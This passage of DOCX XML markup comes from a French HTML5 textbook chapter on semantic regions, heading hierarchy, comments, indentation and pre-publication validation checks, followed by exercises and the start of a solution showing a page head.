      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>LA RÈGLE DU REPÈRE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Chaque région sémantique doit être reconnaissable à l'œil nu. Si vous devez ajouter une classe pour expliquer à quoi sert une </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;section&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, c'est probablement qu'elle n'a pas de rôle structurant : utilisez une </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;div&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> neutre.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>3.6.1 La hiérarchie des titres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les titres </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> forment le sommaire du document. Le niveau doit refléter la profondeur, jamais la taille souhaitée. Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne doit pas apparaître sans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> parent, et une page possède en général un seul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une hiérarchie correcte se lit comme un plan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&lt;h1&gt;Guide HTML5&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h2&gt;Structure&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;h3&gt;Doctype&lt;/h3&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;h3&gt;En-tête&lt;/h3&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h2&gt;Sémantique&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;h3&gt;Régions&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les lecteurs d'écran permettent de naviguer de titre en titre : une hiérarchie cohérente transforme une page de 3 000 mots en document explorable en quelques secondes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.7 Les commentaires et l'indentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un commentaire HTML s'écrit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;!-- ... --&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Il reste visible dans le code source envoyé au navigateur : n'y placez jamais d'information sensible, comme un mot de passe ou une adresse interne. Réservez-le aux repères de structure et aux notes de maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un commentaire utile, un commentaire dangereux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 Début de la zone de navigation principale --&gt;</w:t>
        <w:br/>
        <w:t>&lt;nav aria-label="Navigation principale"&gt;...&lt;/nav&gt;</w:t>
        <w:br/>
        <w:t>&lt;!-- Fin de la zone de navigation --&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Ne jamais écrire :</w:t>
        <w:br/>
        <w:t xml:space="preserve">     mot de passe temporaire : ****</w:t>
        <w:br/>
        <w:t xml:space="preserve">     serveur de préproduction : 10.0.0.12</w:t>
        <w:br/>
        <w:t>--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'indentation n'a aucun effet sur le rendu, mais un effet majeur sur la maintenance. Deux espaces par niveau, une balise par ligne pour les structures, et des lignes de moins de 100 caractères rendent les différences Git lisibles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.8 Valider et diagnostiquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La validation signale les erreurs de grammaire. Certaines sont bloquantes, d'autres sont des avertissements à comprendre plutôt qu'à faire taire. Trois outils complètent la validation : l'inspecteur, l'audit d'accessibilité et le contrôle de rendu sans styles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.10 — Cinq contrôles à effectuer avant de publier une page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196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Contrôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="393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Ce qu'il révèle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1967"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Grammaire HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Validateur W3C / vnu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Balises mal fermées, attributs invalides</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1967"/>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Accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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axe DevTools, Lighthouse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Contrastes, libellés, titres manquants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1967"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lighthouse, PageSpeed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ressources bloquantes, images lourdes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1967"/>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Rendu sans CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Désactivation des styles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="39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Structure illisible, ordre incohérent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1967"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aperçu social</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Validateurs Open Graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3933"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image absente, titre tronqué</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LE PROTOCOLE DES CINQ MINUTES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Avant chaque commit : valider le HTML, vérifier la console, tester au clavier, réduire la fenêtre à 360 pixels, couper le CSS. Cinq minutes qui évitent des heures de correction.</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&lt;!doctype html&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> déclenche le mode standard ; sans lui, le rendu devient imprévisible.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lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>charset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sont des métadonnées invisibles aux effets majeurs.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viewport ne doit jamais bloquer le zoom.</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Titre et description se rédigent page par page, avec soin.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Les scripts se chargent avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou en module pour ne pas bloquer l'analyse.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régions sémantiques décrivent la page ; les titres forment son plan.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document valide est un prérequis, pas une garantie de qualité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La structure est posée. Le chapitre suivant entre dans le contenu : titres, paragraphes, listes, citations et tout l'art de choisir la balise juste.</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3.1 — Écrire un en-tête complet</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 xml:space="preserve">Créez la page </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>article.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> d'un blog personnel.</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Déclarez la langue française, l'encodage UTF-8 et le viewport.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Rédigez un titre de 55 caractères et une description de 140 caractères.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Ajoutez les balises Open Graph et une favicon SVG.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Validez le document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 3.2 — Réparer une page non structurée</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 xml:space="preserve">Cette page fonctionne visuellement mais n'utilise que des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>div</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Réécrivez-la avec les éléments sémantiques appropriés.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Corrigez la hiérarchie des titres.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Justifiez chaque remplacement en une phrase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 3.3 — Contrôler le chargement des ressources</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Prenez une page contenant une feuille de style, une police et un script.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Chargez-la avec un réseau bridé (3G lente) dans les outils du navigateur.</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Notez l'ordre des requêtes et le moment du premier rendu.</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 xml:space="preserve">Ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> au script et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>preload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> à la police, puis comparez.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 3.4 — Auditer l'en-tête d'un site réel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ANALYSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Choisissez trois sites de nature différente : institutionnel, média, commerce.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 xml:space="preserve">Relevez leurs balises </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, Open Graph et favicon.</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Comparez la longueur des titres et la qualité des descriptions.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Identifiez une bonne pratique à reprendre et une erreur à éviter.</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3.1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&lt;!doctype html&gt;</w:t>
        <w:br/>
        <w:t>&lt;html lang="fr"&gt;</w:t>
        <w:br/>
        <w:t>&lt;head&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta charset="utf-8"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;title&gt;Cinq erreurs de débutant en HTML — Mon blog&lt;/title&gt;</w:t>
        <w:br/>
        <w:t>&lt;meta name="description" content="Les cinq erreurs de structure HTML les plus</w:t>
        <w:br/>
